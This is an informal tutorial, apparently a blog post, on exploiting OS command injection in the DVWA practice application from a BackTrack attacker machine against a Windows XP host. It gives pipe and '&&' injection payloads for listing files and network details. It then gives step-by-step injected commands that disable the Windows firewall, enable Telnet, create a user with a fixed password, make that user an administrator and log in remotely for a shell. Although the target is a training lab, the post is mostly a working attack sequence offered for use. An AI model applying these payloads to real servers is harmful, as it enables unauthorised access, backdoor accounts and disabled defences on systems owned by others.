Command Execution Vulnerability Exploitation

Today i will be showing how to hack the website with the command execution vulnerability.

we will be see this on the DVWA

What is Command Execution ?

OS command injection is a technique used via a web interface in order to execute OS commands on a web server.

The user supplies operating system commands through a web interface in order to execute OS commands. Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords.

*** In the previous article i written how to access the dvwa from the backtrack that is installed in XP machine

Practical:

1.Take XP machine and the Backtrack Machine

2.Enter the ip of the XP machine and the dvwa

http://192.168.25.54/dvwa

the dvwa will open and go to command execution

3.The DVWA website asked to enter the IP to ping

so enter the 127.0.0.1(Your IP)

its pingging so its cool ..

4.Now try to execute the dir command ..

boom.......

got an error whats the problem ..

it only allows you to execute the ping command not any other then

how to bypass this

we can bypass this by using && or |(pipe) symbol

5. Now lets try this command

127.0.0.1 && dir  ( or)

127.0.0.1 | dir   ( or)

 | dir

means just pipe and command

ok its executed, now try to find the ip of remote system

127.0.0.1 | ifconfig

Now if u want to find the files in the system32 directory then

127.0.0.1 && cd ../../../../../windows/system32 & dir

Now you can access what ever files you require from the system

What else we can do with Command Execution

Normally i am executing the command like this

| dir

but after this i want to take shell of the remote computer, we are having different ways i am showing one

1.so what i do is i disabled the firewall by executing the windows commands

To disable the windows XP firewall

    netsh firewall set opmode disable

In your command execution type as "| netsh firewall set opmode disable" (without quotes)
   
To enable the windows XP firewall

    netsh firewall set opmode enable
   
2. After that i want to start the service which is help ful for me, so i started the TELNET service by using the following commands

To start the TELNET service from command prompt

    sc config tlntsvr start= auto (Hit Enter)

    net start telnet

In your command execution type as "| sc config tlntsvr start= auto" (without quotes)

    | net start telnet

3.so i want to access the remote PC with the help of Telnet but it will ask the login and password

so i added 1 user from cmd prompt only

To add new user from command prompt

    net user /add user1 Ab12345

In your command execution type as "| net user /add user1 Ab12345" (without quotes)

4.Now i am the user but not having prievilages to access the telnet so thats why i added this user to the Administrators group for admin prievilages

    net localgroup administrators user1 /add

In your command execution type as "| net localgroup administrators user1 /add" (without quotes)   

5.I started a terminal in the backtrack and try to connect with the telnet

After that now i connected with the telnet

    telnet 192.168.x.x
   
    login:user1
    password:Ab12345

Boooooooooooooooom...............
   
Got the shell of the remote computer

    c:\>